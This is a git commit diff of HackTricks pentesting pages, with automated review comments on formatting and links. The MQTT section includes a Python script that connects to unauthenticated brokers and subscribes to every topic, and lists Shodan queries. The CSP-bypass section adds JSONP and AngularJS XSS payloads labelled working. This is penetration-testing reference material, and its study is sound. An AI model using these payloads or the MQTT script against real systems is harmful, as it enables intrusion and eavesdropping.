GitBook: [#3360] No subject

CPol 2022-08-12 14:24:34 +00:00 committed by gitbook-bot
parent a7cb149ce8
commit ca31549018
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 15 additions and 20 deletions


@ -1,4 +1,4 @@
# 1883, 8883 - Pentesting MQTT (Mosquitto)
# 1883 - Pentesting MQTT (Mosquitto)
<details>
@ -16,27 +16,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Basic Information
## Basic Information
MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, **extremely simple and lightweight messaging protocol**, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. The design principles are to minimise network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal of the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.
**Default port:** 1883 (clear), 8883 (Secure MQTT, MQTT over TLS) [[1][1]]
**Default port:** 1883
```
PORT STATE SERVICE REASON
1883/tcp open mosquitto version 1.4.8 syn-ack
```
# Inspecting the traffic
## Inspecting the traffic
MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:**
![](<../.gitbook/assets/image (645) (1).png>)
## [**Brute-Force MQTT**](../brute-force.md#mqtt)
### [**Brute-Force MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
# Pentesting MQTT
## Pentesting MQTT
**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords.
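Review bot: The `**Default port:**` line now lists only 1883 and drops `8883 (Secure MQTT, MQTT over TLS)` along with its `[[1][1]]` citation, while the unchanged paragraph at the end of this hunk still says encryption is not used by default, so the page no longer tells the reader which port a TLS listener normally uses. If the removal is deliberate, the commit subject ("No subject") should say why; otherwise keep the TLS port on this line. Separately, the Brute-Force link target changes to `../generic-methodologies-and-resources/brute-force.md#mqtt`; confirm that path and anchor exist, since a wrong relative link only shows up in the rendered book.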
@ -60,7 +59,6 @@ mosquitto_sub -t 'test/topic' -v #Subscriribe to 'test/topic'
Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**:
```python
#!/usr/bin/env python
#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
import paho.mqtt.client as mqtt
import time
@ -89,11 +87,11 @@ if __name__ == "__main__":
main()
```
# More information
## More information
from here: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
## The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>
### The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>
The publish/subscribe model is composed of:
@ -104,7 +102,7 @@ The publish/subscribe model is composed of:
![](https://miro.medium.com/max/1073/1\*sIxvchdgHSqAGebJjFHBAg.png)
## Packet Format <a href="#f15a" id="f15a"></a>
### Packet Format <a href="#f15a" id="f15a"></a>
Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
@ -114,13 +112,9 @@ The first field of the fixed header represents the type of the MQTT Packet. All
![](https://miro.medium.com/max/1469/1\*z0fhdUVzGa0PLikH\_cyBmQ.png)
# Shodan
## Shodan
* `port:1883 MQTT`
* `port:8883 MQTT`
[1]:http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html#_Network_Connections
<details>
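Review bot: In the Shodan list, `port:8883 MQTT` is removed and only `port:1883 MQTT` remains, so brokers on the TLS port drop out of the search guidance with no explanation in the commit message. Removing the `[1]:` reference definition is safe only if no `[1]` use is left in the file; this diff removes one use on the Default port line, so check for any others before merging.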
@ -137,5 +131,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>


@ -248,11 +248,14 @@ If the application is using angular JS and scripts are loaded from a whitelisted
Working payloads:
```
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
```html
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
```
Other JSONP arbitrary execution endpoints can be found in [**here**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) **** (some of them were deleted or fixed)
### Bypass CSP with dangling markup
Read [how here](../dangling-markup-html-scriptless-injection.md).
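Review bot: The line starting `Other JSONP arbitrary execution endpoints` has an empty bold span (`****`) after the link and reads "found in here"; drop the stray asterisks and the "in" so the sentence renders cleanly. The fence is now tagged `html`, but the entry beginning `ng-app"ng-csp ng-click=` starts mid-attribute rather than with a tag, so the highlighter will mis-render that line; either leave the fence untagged as before or add a short sentence above the block saying the entries are fragments for different injection contexts. The parenthetical "(some of them were deleted or fixed)" would be more useful with the date the list was last checked.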